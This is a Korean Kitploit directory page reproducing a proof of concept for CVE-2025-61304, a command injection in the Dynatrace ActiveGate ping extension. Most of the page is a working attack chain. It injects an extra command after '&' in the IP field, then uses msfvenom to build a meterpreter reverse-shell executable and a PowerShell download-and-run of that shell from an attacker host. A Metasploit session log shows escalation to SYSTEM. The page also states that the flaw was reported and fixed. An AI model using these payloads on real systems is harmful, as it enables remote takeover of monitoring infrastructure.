Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-61304 — 1.016까지의 Dynatrace ActiveGate ping 확장 프로그램에서 조작된 IP 주소를 통해 발생하는 OS 명령 주입 취약점 | Kitploit
도구/GitHubGitHub/pentastic-be/cve-2025-61304
Privilege EscalationPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPost-Exploitation
GitHubpentastic-be/cve-2025-61304

CVE-2025-61304

1.016까지의 Dynatrace ActiveGate ping 확장 프로그램에서 조작된 IP 주소를 통해 발생하는 OS 명령 주입 취약점

저장소 보기
29개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-61304

"조작된 IP 주소를 통한 Dynatrace ActiveGate ping 확장 프로그램(최대 1.016)의 OS 명령 주입 취약점"

내부적으로 ping 확장 프로그램은 Windows 명령 프롬프트를 사용하여 ping을 수행합니다. Test Target Host 입력 필드의 길이도 1024자입니다. IP 주소 뒤에 '&'를 사용하기만 하면 ActiveGate가 실행할 추가 명령을 작성할 수 있습니다.

Dynatrace에 보고되었으며 다음 커밋으로 수정되었습니다: https://github.com/Dynatrace/dynatrace-api/pull/99

사용자 추가를 위한 RCE 악용:

add_user

로컬 사용자 목록(전후):

exploit

기타 예시 페이로드:

  1. meterpreter 역방향 셸 생성:
root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.51.200 LPORT=4444 -f exe > mshell.exe
  1. ping 확장 프로그램을 사용하여 Cloud 인터페이스를 통해 ActiveGate에서 셸을 다운로드 및 실행:
root@kitploit:~
google&powershell.exe $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://192.168.51.200/mshell.exe -OutFile c:\test\mshell.exe

google&c:\test\mshell.exe

  1. 결과 세션
root@kitploit:~
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.51.200:4444 

[*] Sending stage (200262 bytes) to 192.168.51.54
[*] Meterpreter session 3 opened (192.168.51.200:4444 -> 192.168.51.54:49800 ) at 2023-01-21 19:02:16 +0100

meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > getsystem 
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo
Computer        : WIN-9493M3CRTDV
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
도구 다운로드